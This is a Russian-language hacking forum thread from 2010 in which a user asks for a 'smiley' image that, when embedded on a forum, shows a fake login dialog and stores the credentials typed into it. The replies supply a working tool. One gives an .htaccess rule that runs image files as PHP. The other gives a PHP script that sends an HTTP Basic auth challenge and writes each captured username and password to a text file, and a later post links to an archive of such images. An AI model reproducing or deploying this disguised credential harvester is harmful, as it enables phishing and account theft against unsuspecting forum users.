ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу xss
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss
  #1  
Старый 13.03.2010, 01:16
Аватар для n1ck
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
Question xss
поделитесь файликом или напомните как называется у меня где то было на компе найти не могу или потер случайно в общем суть такая
есть там картинка с кодом и файл htaccess
эта картинка выглядит как смайл при вставке ссылки на форуме или на сайте выскакивает окошко с просьбой ввести логин и пароль при вводе он сохраняет логин и пароль на сервере где картинка.
если можете прикрепите файл или напомните как называеться
 
Ответить с цитированием

  #2  
Старый 13.03.2010, 01:28
Аватар для wolmer
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию
В htaccess добавляешь (точно не помню, но вроде это):
AddType application/x-httpd-php .jpg

Далее гуглишь как вызвать basic авторизацию на php, ну и собственно кладешь скрипт (с basic авторизацией) в .jpg "формат" на сервере, и даешь эту jpg своему другу к примеру
 
Ответить с цитированием

  #3  
Старый 13.03.2010, 01:38
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
image.gif
PHP код:
<?
    $filevalid    'base.txt';
    $good        fopen($filevalid'a+');
header("WWW-Authenticate: Basic realm=\"Access Forbidden - Private level\"");
header("HTTP/1.0 401 Access Forbidden");
if (isset($_SERVER["PHP_AUTH_USER"]) ) {
$user $_SERVER["PHP_AUTH_USER"];
$pass $_SERVER["PHP_AUTH_PW"];
fwrite ($good$user.';'.$pass."\n");
header("HTTP/1.0 200");
//exit("test");
}

?>

.htaccess
PHP код:
<files "image.gif">
AddType application/x-httpd-php .gif
</files

base.txt (с правами 777)
PHP код:
 
Ответить с цитированием

  #4  
Старый 13.03.2010, 01:54
Аватар для n1ck
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
По умолчанию
Спасибо большой за помощь
 
Ответить с цитированием

  #5  
Старый 13.03.2010, 02:01
Аватар для n1ck
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
По умолчанию
Вот кстате я такой архивчик искал
http://forum4game.freetzi.com/images/
не у кого нету?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ